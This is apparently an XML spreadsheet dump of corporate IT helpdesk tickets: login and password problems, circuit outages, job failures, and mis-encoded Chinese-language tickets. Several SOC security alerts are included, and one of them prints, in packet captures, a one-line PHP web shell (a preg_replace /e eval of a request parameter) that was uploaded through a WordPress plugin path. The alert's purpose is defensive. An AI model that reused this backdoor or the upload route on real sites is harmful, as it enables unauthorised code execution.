  <r>
    <s v="network outage : , spain kenci site is hard down at 8:40 pm et on 08/16. no backup circuit."/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________8:40 pm et on 08/16.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no______     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ____na_______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ____no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login issue "/>
    <s v="login issue "/>
    <s v="toqcmkfw inwporqy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company login issue."/>
    <s v="company login issue."/>
    <s v="wyjsbzda yfeuhtib"/>
    <x v="0"/>
  </r>
  <r>
    <s v="åˆ¶ç²‰ç”µè„‘ç”µæºçº¿ç­‰æŸå"/>
    <s v="åˆ¶ç²‰ä¸‰æ¥¼æŽ§åˆ¶å®¤å†…ç”µè„‘ç”µæºçº¿ã€ç½‘çº¿ç­‰å› é«˜æ¸©æŸåï¼Œéœ€æ›´æ¢ã€‚"/>
    <s v="agyvbnwz mxsonkdc"/>
    <x v="47"/>
  </r>
  <r>
    <s v="skype for businessæ•…éšœ"/>
    <s v="ç³»ç»Ÿä¸­çªç„¶æ‰¾ä¸åˆ°skype for businessäº†"/>
    <s v="uheflzgy cpaosbfz"/>
    <x v="47"/>
  </r>
  <r>
    <s v="æ‹¼å†™å’Œè¯­æ³•é”™è¯¯"/>
    <s v="ç¼–è¾‘pptæ—¶ï¼Œæ€»æ˜¯å¼¹å‡º&quot;æ— æ³•æ£€æŸ¥æ‹¼å†™å’Œè¯­æ³•é”™è¯¯&quot;ï¼Œä¹Ÿæ— æ³•å®‰è£…ã€‚"/>
    <s v="jtplaoui uvsihfpn"/>
    <x v="47"/>
  </r>
  <r>
    <s v="ç”µè„‘æ•…éšœ"/>
    <s v="è´¨æŽ§éƒ¨æ‹‰åŠ›è¯•éªŒæœºæŽ§åˆ¶ç”µè„‘çš„æ“ä½œç³»ç»Ÿå¯åŠ¨éžå¸¸ç¼“æ…¢ï¼ŒæŽ§åˆ¶è½¯ä»¶ä¸¢å¤±ã€‚"/>
    <s v="kwpzbxvf cvuhoizx"/>
    <x v="47"/>
  </r>
  <r>
    <s v="HostName_188: ora-00600: internal error code, arguments: [kggsmgetstring:1], [0x1233a6d28], [11], [1], [10], [], [], [], []"/>
    <s v="HostName_188 :  ora-00600: internal error code, arguments: [kggsmgetstring:1], [0x1233a6d28], [11], [1], [10], [], [], [], []"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="1"/>
  </r>
  <r>
    <s v="unable to submit discount form "/>
    <s v="unable to submit discount form "/>
    <s v="skyrlznp rzgbmnyt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset erp SID_34 password for user soemec"/>
    <s v="reset erp SID_34 password for user soemec"/>
    <s v="qdbmspxf nqdyiclk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: hr_tooldcvcgenratn"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: hr_tooldcvcgenratn at 08/16/16 17:02:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="user got a pop-up that displayed virus on the browser."/>
    <s v="user got a pop-up that displayed virus on the browser._x000d__x000a_-advised the user to restart the pc as he was unable to open anyother window._x000d__x000a_-issue resolved."/>
    <s v="lomzfqns htznsgdf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="login issue"/>
    <s v="login issue_x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad and unlocked the account._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="khufscza qoixpave"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please extend wireless access from ticket_no1480742 to 12/31/16"/>
    <s v="consultant vmhfteqo jpsfikow from schneider downs needs wireless account extended to the end of the year._x000d__x000a__x000d__x000a_it is due to expire on 8/31/16, per ticket_no1480742._x000d__x000a__x000d__x000a_"/>
    <s v="wqxzleky uwjchqor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lcosm005(conformaclad shop_floor_app server):sqlagent.exe and sqlservr.exe are showing down since 4:02 pm on 8/16 et"/>
    <s v="lcosm005(conformaclad shop_floor_app server):sqlagent.exe and sqlservr.exe are showing down since 4:02 pm on 8/16 et"/>
    <s v="jloygrwh acvztedi"/>
    <x v="1"/>
  </r>
  <r>
    <s v="unable to login to her microsoft 365 email account "/>
    <s v="unable to login to her microsoft 365 email account "/>
    <s v="scourghi luhsqbmy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power outage : usa - (company inc)  vpn circuit is down at 3:45 pm et on 08/16. site is up on primary."/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____slo site____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____________3:45 pm et on 08/16.__________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? __no_____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ____yes____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ___na________   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ____na_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vitalyst // unable to access to forecast to plan in crm"/>
    <s v="unable to access to forecast to plan in crm"/>
    <s v="anpocezt qturbxsg"/>
    <x v="22"/>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aylrbosw gaeycbwd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1320"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1320 at 08/16/16 15:06:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="security incidents - ( #in33505432 ) : repeat outbound connection for 135/tcp from 10.16.140.231"/>
    <s v="source ip :10.16.140.231_x000a_system name :evhl8114123_x000a_user  name: companypzyre mqlsfkre(ldnfgt)_x000a_location :germany_x000a_sep , sms status :no updated_x000a_field sales user ( yes / no) :  no_x000a_dsw event log:see below_x000a_--------------------------------------------------------------------------_x000a_=========================_x000a_incident overview_x000a_=========================_x000a_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_x000a__x000a_1) full escalation for windows login failure alerts (explicit notification via a high priority ticket and a phone call)_x000a_2) automatically resolve windows login failure alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000a__x000a_sincerely,_x000a_secureworks soc_x000a__x000a_=========================_x000a_technical details_x000a_=========================_x000a_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_x000a__x000a_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_x000a_-w32.blaster.worm/msblast/lovsan _x000a_-w32.welchia/nachi_x000a_-w32.reatle_x000a__x000a__x000a_=========================_x000a_references_x000a_=========================_x000a__x000a__x000a__x000a__x000a__x000a__x000a_=========================_x000a_event data_x000a_=========================_x000a_related events: _x000a_event id: 81646471_x000a_event summary: repeat outbound connection for 135/tcp_x000a_occurrence count: 234_x000a_event count: 2_x000a__x000a_host and connection information_x000a_source ip: 10.16.140.231_x000a_source hostname: evhl8114123 _x000a_source port: 54411_x000a_destination ip: 62.157.140.133_x000a_destination port: 135_x000a_destination ip geolocation: ulm, deu_x000a_connection directionality: outgoing_x000a_protocol: tcp_x000a__x000a_device information_x000a_device ip: 80.71.06.702_x000a_device name: company-european-asa.company.com-1_x000a_log time: 2016-08-15 at 09:26:41 utc_x000a_action: blocked_x000a_cvss score: -1 _x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 237526_x000a_inspector rule id: 186739_x000a_inspector event id: 626672260_x000a_ontology id: 200020003203009162_x000a_event type id: 200020003203009062_x000a_agent id: 103761_x000a__x000a_event detail:_x000a_aug 15 09:26:41 80.71.06.702 %asa-4-106023: deny tcp src inside:10.16.140.231/54411 dst noris:62.157.140.133/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000a__x000a__x000a__x000a_event id: 81646714_x000a_event summary: repeat outbound connection for 135/tcp_x000a_occurrence count: 234_x000a_event count: 2_x000a__x000a_host and connection information_x000a_source ip: 10.16.140.231_x000a_source hostname: evhl8114123 _x000a_source port: 54411_x000a_destination ip: 80.156.86.78_x000a_destination port: 135_x000a_destination ip geolocation: ulm, deu_x000a_connection directionality: outgoing_x000a_protocol: tcp_x000a__x000a_device information_x000a_device ip: 80.71.06.702_x000a_device name: company-european-asa.company.com-1_x000a_log time: 2016-08-15 at 09:26:41 utc_x000a_action: blocked_x000a_cvss score: -1 _x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 237526_x000a_inspector rule id: 186739_x000a_inspector event id: 626672260_x000a_ontology id: 200020003203009162_x000a_event type id: 200020003203009062_x000a_agent id: 103761_x000a__x000a_event detail:_x000a_aug 15 09:27:49 80.71.06.702 %asa-4-106023: deny tcp src inside:10.16.140.231/54481 dst noris:80.156.86.78/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="name:mikhghytr karaffa_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:vfrdxtqw.jfbmsenz@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:hello, can you please advise on my crm password to start?"/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update on crm access ticket_no0430983"/>
    <s v="update on crm access ticket_no0430983"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0430539"/>
    <s v="ticket update on ticket_no0430539"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_850619"/>
    <s v="ticket update on inplant_850619"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_850899"/>
    <s v="ticket update on inplant_850899"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_850503"/>
    <s v="ticket update on inplant_850503"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( #in33505432 ) : repeat outbound connection for 135/tcp from 10.16.140.231"/>
    <s v="source ip :10.16.140.231_x000d__x000a_system name :evhl8114123_x000d__x000a_user  name: companypzyre mqlsfkre(ldnfgt)_x000d__x000a_location :germany_x000d__x000a_sep , sms status :no updated_x000d__x000a_field sales user ( yes / no) :  no_x000d__x000a_dsw event log:see below_x000d__x000a_--------------------------------------------------------------------------_x000d__x000a_=========================_x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_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sincerely,_x000d__x000a_secureworks soc_x000d__x000a__x000d__x000a_=========================_x000d__x000a_technical details_x000d__x000a_=========================_x000d__x000a_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_x000d__x000a__x000d__x000a_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_x000d__x000a_-w32.blaster.worm/msblast/lovsan _x000d__x000a_-w32.welchia/nachi_x000d__x000a_-w32.reatle_x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_references_x000d__x000a_=========================_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_event id: 81646471_x000d__x000a_event summary: repeat outbound connection for 135/tcp_x000d__x000a_occurrence count: 234_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 10.16.140.231_x000d__x000a_source hostname: evhl8114123 _x000d__x000a_source port: 54411_x000d__x000a_destination ip: 62.157.140.133_x000d__x000a_destination port: 135_x000d__x000a_destination ip geolocation: ulm, deu_x000d__x000a_connection directionality: outgoing_x000d__x000a_protocol: tcp_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 80.71.06.702_x000d__x000a_device name: company-european-asa.company.com-1_x000d__x000a_log time: 2016-08-15 at 09:26:41 utc_x000d__x000a_action: blocked_x000d__x000a_cvss score: -1 _x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 237526_x000d__x000a_inspector rule id: 186739_x000d__x000a_inspector event id: 626672260_x000d__x000a_ontology id: 200020003203009162_x000d__x000a_event type id: 200020003203009062_x000d__x000a_agent id: 103761_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_aug 15 09:26:41 80.71.06.702 %asa-4-106023: deny tcp src inside:10.16.140.231/54411 dst noris:62.157.140.133/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_event id: 81646714_x000d__x000a_event summary: repeat outbound connection for 135/tcp_x000d__x000a_occurrence count: 234_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 10.16.140.231_x000d__x000a_source hostname: evhl8114123 _x000d__x000a_source port: 54411_x000d__x000a_destination ip: 80.156.86.78_x000d__x000a_destination port: 135_x000d__x000a_destination ip geolocation: ulm, deu_x000d__x000a_connection directionality: outgoing_x000d__x000a_protocol: tcp_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 80.71.06.702_x000d__x000a_device name: company-european-asa.company.com-1_x000d__x000a_log time: 2016-08-15 at 09:26:41 utc_x000d__x000a_action: blocked_x000d__x000a_cvss score: -1 _x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 237526_x000d__x000a_inspector rule id: 186739_x000d__x000a_inspector event id: 626672260_x000d__x000a_ontology id: 200020003203009162_x000d__x000a_event type id: 200020003203009062_x000d__x000a_agent id: 103761_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_aug 15 09:27:49 80.71.06.702 %asa-4-106023: deny tcp src inside:10.16.140.231/54481 dst noris:80.156.86.78/135 by access-group &quot;acl_inside&quot; [0xed29b7f9, 0x0]"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="circuit outage: carrier, india telecom_vendor_1 circuit is down since 3:55 am et on 08/16 site is up on primary tikona circuit"/>
    <s v="what type of outage:  _x____network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _______3:55 am et on 08/16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na___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unable to access site "/>
    <s v="unable to access site "/>
    <s v="wvngzrca sfmrzdth"/>
    <x v="0"/>
  </r>
  <r>
    <s v="could you please help set up erp.  my user name and password do not work"/>
    <s v="_x000d__x000a__x000d__x000a_received from: saqbgcpl.ybfzcjiq@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_could you please help set up erp.  my user name and password do not work._x000d__x000a_"/>
    <s v="saqbgcpl ybfzcjiq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="zmmdata currency error when trying to extend to plant_317.  assign to vaghjmskee krisyuhnyrt"/>
    <s v="zmmdata currency error when trying to extend to plant_317.  assign to vaghjmskee krisyuhnyrt_x000a__x000a_i am getting the following error when trying to extend to plant_317.  example mm#2240970_x000a__x000a_currency amount 3.4500 jpy in field moving_pr could not be converted_x000a_"/>
    <s v="ivkhegjw gquflzse"/>
    <x v="20"/>
  </r>
  <r>
    <s v="unable to connect to dv06"/>
    <s v="unable to connect to dv06"/>
    <s v="ulmctsvi lbvrdika"/>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mreocsnk swoyxzma"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security incidents - ( sw #in33501789 ) : broadscanning: possible vulnerability scanning - 46.161.9.35"/>
    <s v="we are seeing activity indicating the host at 46.161.9.35 is conducting a vulnerability scan. these scans are used to identify specific vulnerabilities on a remote host that could be exploited to potentially interfere with service availability, execute code, or usa an attacker with unauthorized access. the results of this scan could be used for future attacks or exploitation of the targeted host(s). _x000d__x000a__x000d__x000a_based on our internet visibility we are detecting this as a non-targeted broadscan. similar activity from this source has been detected across our client base. please consider blocking this ip address and investigating the host for any malicious scrip_x000d__x000a__x000d__x000a_we are escalating this incident to you via a medium priority ticket as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d__x000a__x000d__x000a_1)full escalation for broadscanning alerts (explicit notification via a high priority ticket and phone call)_x000d__x000a_2)autoresolve for broadscanning alerts directly to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000d__x000a__x000d__x000a_sincerely,_x000d__x000a_secureworks soc_x000d__x000a__x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_event id: 43589636_x000d__x000a_event summary: 20369 vid12631 suspicious executable file upload php http incoming_x000d__x000a_occurrence count: 2_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 46.161.9.35_x000d__x000a_source port: 52806_x000d__x000a_source ip geolocation: st pethrywrsburg, rus_x000d__x000a_destination ip: 172.20.10.37_x000d__x000a_destination port: 80_x000d__x000a_connection directionality: incoming_x000d__x000a_protocol: tcp_x000d__x000a_http method: post_x000d__x000a_http status code: 404_x000d__x000a_user agent: mozilla/5.0 (windows nt 6.1; rv:34.0) gecko/31211212 firefox/34.0_x000d__x000a_host: www.companyipg.com_x000d__x000a_full url path: /wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 172.20.10.208_x000d__x000a_device name: isensor02.company.com_x000d__x000a_log time: 2016-08-14 at 20:38:30 utc_x000d__x000a_action: not blocked_x000d__x000a_vendor eventid: 655375_x000d__x000a_cvss score: -1 _x000d__x000a_vendor priority: 3_x000d__x000a_vendor version: 7_x000d__x000a_vendor reference: vid, 12631_x000d__x000a_file name: wp-setup.php_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 891631_x000d__x000a_inspector rule id: 277082_x000d__x000a_inspector event id: 61024435_x000d__x000a_ontology id: 200020003203722280_x000d__x000a_event type id: 200020003203056732_x000d__x000a_agent id: 103793_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_[**] [1:21131470:5] 20369 vid12631 suspicious executable file upload php http incoming [**]_x000d__x000a_[classification: none] [priority: 3] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000d__x000a_[sensor id: 602984][event id: 655375][time: 2582318221.714106]_x000d__x000a_[xref =&gt; vid, 12631]_x000d__x000a_[src ip: 46.161.9.35][dst ip: 172.20.10.37][sport/itype: 52806][dport/icode: 80][proto: 6]_x000d__x000a_08/14/2016-20:38:30.714106 46.161.9.35:52806 -&gt; 172.20.10.37:80_x000d__x000a_tcp ttl:49 tos:0x68 id:4444 iplen:20 dgmlen:714 df_x000d__x000a_***ap*** seq: 0x49c51796 ack: 0x9698e7c8 win: 0x73 tcplen: 32_x000d__x000a_tcp options (3) =&gt; nop nop ts: 380683315 9237098 _x000d__x000a_==pcap 1==_x000d__x000a__x000d__x000a__x000d__x000a_[ex http_uri 9: /wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php]_x000d__x000a__x000d__x000a_[ex http_hostname 10: www.companyipg.com]_x000d__x000a__x000d__x000a_[o:security]_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_==pcap 1 ascii s==_x000d__x000a_.......wz...........eh...\@.1.gm...#...%.f.pi..........sk2...........|..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quot;file&quot;;.filename=&quot;wp-setup.php&quot;..content-type:.text/plain....&lt;?php.if.(!isset($_request['e51e'])).header(&quot;http/1.0.404.not.found&quot;);.@preg_replace('/(.*)/e',.@$_request['e51e'],.'');.?&gt;..--ba7336a47f1648dc9255eb59510e6f02--.._x000d__x000a_==pcap 1 ascii e==_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_==pcap 1 hex s==_x000d__x000a_000000 0c00 0000 c6d6 b057 7ae5 0a00 ca02 0000 .......wz......._x000d__x000a_000010 ca02 0000 4568 02ca 115c 4000 3106 476d ....eh...\@.1.gm_x000d__x000a_000020 2ea1 0923 ac14 0a25 ce46 0050 49c5 1796 ...#...%.f.pi..._x000d__x000a_000030 9698 e7c8 8018 0073 6b32 0000 0101 080a .......sk2......_x000d__x000a_000040 10a9 eeec 007c 020b 504f 5354 202f 7770 .....|..post./wp_x000d__x000a_000050 2d63 6f6e 7465 6e74 2f70 6c75 6769 6e73 -content/plugins_x000d__x000a_000060 2f69 6e62 6f75 6e64 696f 2d6d 6172 6b65 /inboundio-markhtye_x000d__x000a_000070 7469 6e67 2f61 646d 696e 2f70 6172 7469 ting/admin/parti_x000d__x000a_000080 616c 732f 6373 765f 7570 6c6f 6164 6572 als/csv_uploader_x000d__x000a_000090 2e70 6870 2048 5454 502f 312e 310d 0a48 .php.http/1.1..h_x000d__x000a_0000a0 6f73 743a 2077 7777 2e6b 656e 6e61 6d65 ost:.www.companyme_x000d__x000a_0000b0 7461 6c69 7067 2e63 6f6d 0d0a 436f 6e74 talipg.com..cont_x000d__x000a_0000c0 656e 742d 4c65 6e67 7468 3a20 3239 370d ent-length:.297._x000d__x000a_0000d0 0a41 6363 6570 742d 456e 636f 6469 6e67 .accept-encoding_x000d__x000a_0000e0 3a20 677a 6970 2c20 6465 666c 6174 650d :.gzip,.deflate._x000d__x000a_0000f0 0a41 6363 6570 743a 202a 2f2a 0d0a 5573 .accept:.*/*..us_x000d__x000a_000100 6572 2SID_29 6765 6e74 3a20 4d6f 7a69 6c6c er-agent:.mozill_x000d__x000a_000110 612f 352e 3020 2857 696e 646f 7773 204e a/5.0.(windows.n_x000d__x000a_000120 5420 362e 313b 2072 763a 3334 2e30 2920 t.6.1;.rv:34.0)._x000d__x000a_000130 4765 636b 6f2f 3230 3130 3031 3031 2046 gecko/31211212.f_x000d__x000a_000140 6972 6566 6f78 2f33 342e 300d 0a43 6f6e irefox/34.0..con_x000d__x000a_000150 6e65 6374 696f 6e3a 206b 6565 702d 616c nection:.keep-al_x000d__x000a_000160 6976 650d 0a43 6f6e 7465 6e74 2d54 7970 ive..content-typ_x000d__x000a_000170 653a 206d 756c 7469 7061 7274 2f66 6f72 e:.multipart/for_x000d__x000a_000180 6d2d 6461 7461 3b20 626f 756e 6461 7279 m-data;.boundary_x000d__x000a_000190 3d62 6137 3333 3661 3437 6631 3634 3864 =ba7336a47f1648d_x000d__x000a_0001a0 6339 3235 3565 6235 3935 3130 6536 6630 c9255eb59510e6f0_x000d__x000a_0001b0 320d 0a0d 0a2d 2d62 6137 3333 3661 3437 2....--ba7336a47_x000d__x000a_0001c0 6631 3634 3864 6339 3235 3565 6235 3935 f1648dc9255eb595_x000d__x000a_0001d0 3130 6536 6630 320d 0a43 6f6e 7465 6e74 10e6f02..content_x000d__x000a_0001e0 2d44 6973 706f 7369 7469 6f6e 3a20 666f -disposition:.fo_x000d__x000a_0001f0 726d 2d64 6174 613b 206e 616d 653d 2266 rm-data;.name=&quot;f_x000d__x000a_000200 696c 6522 3b20 6669 6c65 6e61 6d65 3d22 ile&quot;;.filename=&quot;_x000d__x000a_000210 7770 2d73 6574 7570 2e70 6870 220d 0a43 wp-setup.php&quot;..c_x000d__x000a_000220 6f6e 7465 6e74 2d54 7970 653a 2074 6578 ontent-type:.tex_x000d__x000a_000230 742f 706c 6169 6e0d 0a0d 0a3c 3f70 6870 t/plain....&lt;?php_x000d__x000a_000240 2069 6620 2821 6973 7365 7428 245f 5245 .if.(!isset($_re_x000d__x000a_000250 5155 4553 545b 2765 3531 6527 5d29 2920 quest['e51e']))._x000d__x000a_000260 6865 6164 6572 2822 4854 5450 2f31 2e30 header(&quot;http/1.0_x000d__x000a_000270 2034 3034 204e 6f74 2046 6f75 6e64 2229 .404.not.found&quot;)_x000d__x000a_000280 3b20 4070 7265 675f 7265 706c 6163 6528 ;.@preg_replace(_x000d__x000a_000290 272f 282e 2a29 2f65 272c 2040 245f 5245 '/(.*)/e',.@$_re_x000d__x000a_0002a0 5155 4553 545b 2765 3531 6527 5d2c 2027 quest['e51e'],.'_x000d__x000a_0002b0 2729 3b20 3f3e 0d0a 2d2d 6261 3733 3336 ');.?&gt;..--ba7336_x000d__x000a_0002c0 6134 3766 3136 3438 6463 3932 3535 6562 a47f1648dc9255eb_x000d__x000a_0002d0 3539 3531 3065 3666 3032 2d2d 0d0a 59510e6f02--.._x000d__x000a_==pcap 1 hex e==_x000d__x000a__x000d__x000a_event id: 43589634_x000d__x000a_event summary: 20369 vid12631 suspicious executable file upload php http incoming_x000d__x000a_occurrence count: 2_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 46.161.9.35_x000d__x000a_source port: 52806_x000d__x000a_source ip geolocation: st pethrywrsburg, rus_x000d__x000a_destination ip: 208.211.136.158_x000d__x000a_destination port: 80_x000d__x000a_connection directionality: incoming_x000d__x000a_protocol: tcp_x000d__x000a_http method: post_x000d__x000a_http status code: 404_x000d__x000a_user agent: mozilla/5.0 (windows nt 6.1; rv:34.0) gecko/31211212 firefox/34.0_x000d__x000a_host: www.companyipg.com_x000d__x000a_full url path: /wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 208.211.136.207_x000d__x000a_device name: isensplant_247.company.com_x000d__x000a_log time: 2016-08-14 at 20:38:30 utc_x000d__x000a_action: not blocked_x000d__x000a_vendor eventid: 655375_x000d__x000a_cvss score: -1 _x000d__x000a_vendor priority: 3_x000d__x000a_vendor version: 7_x000d__x000a_vendor reference: vid, 12631_x000d__x000a_file name: wp-setup.php_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 891631_x000d__x000a_inspector rule id: 277082_x000d__x000a_inspector event id: 61024435_x000d__x000a_ontology id: 200020003203722280_x000d__x000a_event type id: 200020003203056732_x000d__x000a_agent id: 102989_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_[**] [1:21131470:5] 20369 vid12631 suspicious executable file upload php http incoming [**]_x000d__x000a_[classification: none] [priority: 3] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000d__x000a_[sensor id: 602981][event id: 262411][time: 2582318221.758719]_x000d__x000a_[xref =&gt; vid, 12631]_x000d__x000a_[src ip: 46.161.9.35][dst ip: 208.211.136.158][sport/itype: 52806][dport/icode: 80][proto: 6]_x000d__x000a_08/14/2016-20:38:30.758719 46.161.9.35:52806 -&gt; 208.211.136.158:80_x000d__x000a_tcp ttl:49 tos:0x68 id:4444 iplen:20 dgmlen:714 df_x000d__x000a_***ap*** seq: 0x3043ff92 ack: 0xdef989b5 win: 0x73 tcplen: 32_x000d__x000a_tcp options (3) =&gt; nop nop ts: 380683315 9237098 _x000d__x000a_==pcap 1==_x000d__x000a__x000d__x000a__x000d__x000a_[ex http_uri 9: /wp-content/plugins/inboundio-markhtyeting/admin/partials/csv_uploader.php]_x000d__x000a__x000d__x000a_[ex http_hostname 10: www.companyipg.com]_x000d__x000a__x000d__x000a_[o:security]_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_==pcap 1 ascii s==_x000d__x000a_.......w............eh...\@.1..4...#.....f.p0c.........s.1...........|..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quot;file&quot;;.filename=&quot;wp-setup.php&quot;..content-type:.text/plain....&lt;?php.if.(!isset($_request['e51e'])).header(&quot;http/1.0.404.not.found&quot;);.@preg_replace('/(.*)/e',.@$_request['e51e'],.'');.?&gt;..--ba7336a47f1648dc9255eb59510e6f02--.._x000d__x000a_==pcap 1 ascii e==_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_==pcap 1 hex s==_x000d__x000a_000000 0c00 0000 c6d6 b057 bf93 0b00 ca02 0000 .......w........_x000d__x000a_000010 ca02 0000 4568 02ca 115c 4000 3106 a434 ....eh...\@.1..4_x000d__x000a_000020 2ea1 0923 d0d3 889e ce46 0050 3043 ff92 ...#.....f.p0c.._x000d__x000a_000030 def9 89b5 8018 0073 0f31 0000 0101 080a .......s.1......_x000d__x000a_000040 10a9 eeec 007c 020b 504f 5354 202f 7770 .....|..post./wp_x000d__x000a_000050 2d63 6f6e 7465 6e74 2f70 6c75 6769 6e73 -content/plugins_x000d__x000a_000060 2f69 6e62 6f75 6e64 696f 2d6d 6172 6b65 /inboundio-markhtye_x000d__x000a_000070 7469 6e67 2f61 646d 696e 2f70 6172 7469 ting/admin/parti_x000d__x000a_000080 616c 732f 6373 765f 7570 6c6f 6164 6572 als/csv_uploader_x000d__x000a_000090 2e70 6870 2048 5454 502f 312e 310d 0a48 .php.http/1.1..h_x000d__x000a_0000a0 6f73 743a 2077 7777 2e6b 656e 6e61 6d65 ost:.www.companyme_x000d__x000a_0000b0 7461 6c69 7067 2e63 6f6d 0d0a 436f 6e74 talipg.com..cont_x000d__x000a_0000c0 656e 742d 4c65 6e67 7468 3a20 3239 370d ent-length:.297._x000d__x000a_0000d0 0a41 6363 6570 742d 456e 636f 6469 6e67 .accept-encoding_x000d__x000a_0000e0 3a20 677a 6970 2c20 6465 666c 6174 650d :.gzip,.deflate._x000d__x000a_0000f0 0a41 6363 6570 743a 202a 2f2a 0d0a 5573 .accept:.*/*..us_x000d__x000a_000100 6572 2SID_29 6765 6e74 3a20 